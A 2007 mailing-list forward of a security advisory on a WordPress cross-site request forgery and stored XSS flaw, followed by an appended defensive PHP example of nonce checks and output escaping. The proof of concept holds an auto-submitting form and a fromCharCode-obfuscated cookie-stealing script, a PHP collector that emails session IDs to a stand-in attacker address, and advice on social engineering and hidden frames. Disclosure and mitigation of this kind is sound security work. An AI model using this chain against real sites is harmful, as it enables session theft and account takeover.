[wp-hackers] FWD: [BugTraq] Wordpress <= v2.1.0

Ross M. W. Bennetts ross.bennetts at une.edu.au
Mon Mar 5 23:56:32 GMT 2007


-------------------------------------------------------------------------------
|               ____   ____.__         __
|               \   \ /   /|__|_______/  |_ __ _______  ___
|                \   Y   / |  \_  __ \   __\  |  \__  \ \  \/  /
|                 \     /  |  ||  | \/|  | |  |  // __ \_>    <
|                  \___/   |__||__|   |__| |____/(____  /__/\_ \
|                                                     \/      \/
|
|                             Security without illusions
|
|                                  www.virtuax.be
|
-------------------------------------------------------------------------------


                          Application: Wordpress
                  Vulnerable Versions: <= v2.1.0
                        Vulnerability: XSRF with XSS

                               Vendor: http://www.wordpress.net
                        Vendor Status: Notified

                                Found: 20-02-2007
                  Public Release Date: 01-03-2007
                        Last modified: 01-03-2007
                               Author: ciri
                               E-mail: ciri[a.t]virtuax[d.o.t]be
         
       reference: http://www.virtuax.be/advisories/Advisory4-20022007.txt

===============================================================================

Shouts to the VirtuaX Crew & Community!
Special thanks go out to R4N01 for noticing the XSS!

===============================================================================



I. Background
-------------

"WordPress is a state-of-the-art semantic personal publishing platform with a
focus on aesthetics, web standards, and usability."
                                                             by wordpress.net


II. Vulnerability
-----------------

If you're logged into WordPress as an admin, your comments aren't properly
sanitized, thus allowing an XSS to be posted. Normally an admin wouldn't
input XSS input vectors, but we can make them do it with a simple XSRF
script.

IIa. Affected Versions
----------------------

I'm assuming all versions <= 2.1.0 are vulnerable although I have only tested
the latest version (2.1.0). This should work in all browsers that have
JavaScript enabled (default in most browsers).

III. PoC
--------

[code=sploit.html]
<form action="http://example.com/wp-comments-post.php" method="post"
name="commentform" id="commentform">
<textarea name="comment" id="comment">
<script>location.href =
String.fromCharCode(x,y,z,q,r,s)+document.cookie;</script>
</textarea>

<input type="hidden" name="comment_post_ID" value="**ID**" />
</form>
<script>document.commentform.submit();</script>
[/code]

[code=steal.php]
<?php
//Get the session id
$id = $_GET["id"];

//Send it to our e-mail
mail("evilhacker at yoursite.com", "Cookie stolen", $id);

//Save a backup
$file = fopen('log.txt', 'a');
fwrite($file, $id . "\n\n");
?>
[/code]

Notes:
        - **ID** should be the ID of the comment page in which you want to
          inject the XSS.
        - Replace 'String.fromCharCode(x,y,z,q,r,s)' with the appropriate
          integers which lead to steal.php (you can look them up in an ASCII
          table).
             eg: http://yoursite.com/steel.php?id=
             String.fromCharCode(104,116,116,112,58,47,47,121,111,117,114,
                                 115,105,116,101,46,99,111,109,47,115,116,
                                 101,101,108,46,112,104,112,63,105,100,61);
          We need to do this because WordPress does escape quotes.
                
We trick the admin into going to our sploit.html page (should be fairly easy
using basic social engineering skills). It is recommended that you hide the
page in a frame with no height; more stealth options are beyond the scope of
this advisory. Upon entering the page, the admin will post the XSS input
vector as a comment. Hereafter he and EVERY other user that visits the page
with comments will automatically submit their session IDs to you.

Copyright 2007 by ciri from Virtuax.be All rights reserved.
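Editor's note: the chain above needs two weaknesses at once: the comment form accepts a POST from any origin (XSRF), and the admin's comment body is stored and rendered unescaped (XSS). The following PHP is an added example, not WordPress code and not part of the advisory, showing a comment handler that closes both halves: a per-session HMAC nonce that a cross-site form cannot forge, and output escaping applied to every comment regardless of the author's role. The function names, the `_comment_nonce` field and the `$session_secret` value are assumptions made for the example.

```php
<?php
// Added example (not WordPress code): a comment handler hardened against the
// XSRF + XSS chain described in the advisory. All names here are assumptions.
declare(strict_types=1);

// 1. XSRF: bind the comment form to the visitor's session and to the post.
//    The secret is assumed to live in the server-side session, never in a cookie.
function comment_nonce(string $session_secret, int $post_id): string
{
    return hash_hmac('sha256', 'comment-form:' . $post_id, $session_secret);
}

function verify_comment_nonce(string $session_secret, int $post_id, string $submitted): bool
{
    // hash_equals() compares in constant time so the expected value does not
    // leak through timing differences.
    return hash_equals(comment_nonce($session_secret, $post_id), $submitted);
}

// 2. XSS: escape on output for every author. The advisory's bug was that the
//    admin role bypassed sanitisation; escaping here does not look at the role.
function render_comment(string $comment): string
{
    return '<p>' . htmlspecialchars($comment, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}

// 3. Handler for a POST from the comment form (the equivalent of
//    wp-comments-post.php in the advisory). Returns a status and a body.
function handle_comment_post(array $post, string $session_secret): array
{
    $post_id = filter_var($post['comment_post_ID'] ?? '', FILTER_VALIDATE_INT);
    if ($post_id === false) {
        return ['status' => 400, 'body' => 'bad post id'];
    }
    $nonce = (string)($post['_comment_nonce'] ?? '');
    if (!verify_comment_nonce($session_secret, $post_id, $nonce)) {
        // A form hosted on another site (like sploit.html) cannot know the
        // nonce, so an auto-submitted cross-site POST stops here.
        return ['status' => 403, 'body' => 'missing or invalid form token'];
    }
    $comment = (string)($post['comment'] ?? '');
    return ['status' => 200, 'body' => render_comment($comment)];
}

// Constructed demonstration values.
$secret  = bin2hex(random_bytes(32));   // assumed to come from the session
$payload = '<script>alert(1)</script>'; // constructed XSS probe, not a real attack

// Cross-site POST without a nonce: rejected before the comment is stored.
$forged = handle_comment_post(
    ['comment_post_ID' => '1', 'comment' => $payload],
    $secret
);
// Same-site POST carrying the nonce: accepted, but rendered inert.
$legit = handle_comment_post(
    ['comment_post_ID' => '1', 'comment' => $payload,
     '_comment_nonce' => comment_nonce($secret, 1)],
    $secret
);

echo $forged['status'], "\n";   // 403
echo $legit['body'], "\n";      // <p>&lt;script&gt;alert(1)&lt;/script&gt;</p>
```

The two controls are independent on purpose: the nonce stops the admin's browser from being made to post on an attacker's behalf, and the output escaping means that even a comment the admin really did write cannot run script in other visitors' sessions. Marking the session cookie `HttpOnly` is a third, complementary layer, since the advisory's payload relies on reading `document.cookie`.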
